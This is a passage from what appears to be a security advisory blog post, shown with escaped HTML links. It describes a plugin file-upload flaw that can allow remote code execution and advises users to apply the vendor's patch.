This function lacks sufficient file type validation, allowing for the upload of files that could permit <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2024-51360-remote-code-execution-vulnerability-in-hospital-management-system-in-php-v4-0\/\"  data-wpil-monitor-id=\"54354\">remote code execution<\/a>. Once the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-31916-unrestricted-file-upload-vulnerability-in-jp-students-result-management-system-premium\/\"  data-wpil-monitor-id=\"54874\">file is uploaded<\/a> and executed, the attacker could potentially perform any command on the system that the web server has privileges to execute.<\/p>\n<p><strong>Mitigation Guidance<\/strong><\/p>\n<p>To mitigate this vulnerability, <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-3054-arbitrary-file-upload-vulnerability-in-wp-user-frontend-pro-plugin-for-wordpress\/\"  data-wpil-monitor-id=\"59221\">users of the affected plugin<\/a> should apply the patch provided by the vendor as soon as possible.
